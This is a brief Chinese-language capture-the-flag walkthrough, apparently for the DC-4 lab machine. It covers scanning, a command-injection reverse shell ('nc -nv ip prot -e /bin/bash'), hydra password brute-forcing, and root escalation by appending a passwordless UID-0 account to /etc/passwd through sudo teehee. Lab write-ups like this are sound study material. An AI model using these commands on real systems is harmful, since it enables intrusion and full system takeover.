cd-4思路并不难
我们上来就先信息收集
一般使用,nmap,dirb等
访问80端口
没什么突破点
我们进后台看到一些shell操作
于是我们抓包,建立反弹shell,把命令改成
nc -nv ip prot -e /bin/bash
然后,我们找了很多方法试图提权可惜没用
于是我们开始信息收集
我们最终发现jim的备份文件有一些老密
我们尝试用hydra进行爆破
成功!
然后,我们找了很多方法试图提权可惜没用
于是我们又开始信息收集
我们看到查尔斯给jim发邮件
并且留下了密码
于是我们su到查尔斯
然后我们尝试提权
最后我们发现
其用户拥有teehee的root权限,于是我们输入
echo "zacarx::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
然后我们登录zacarx账户
拿到flag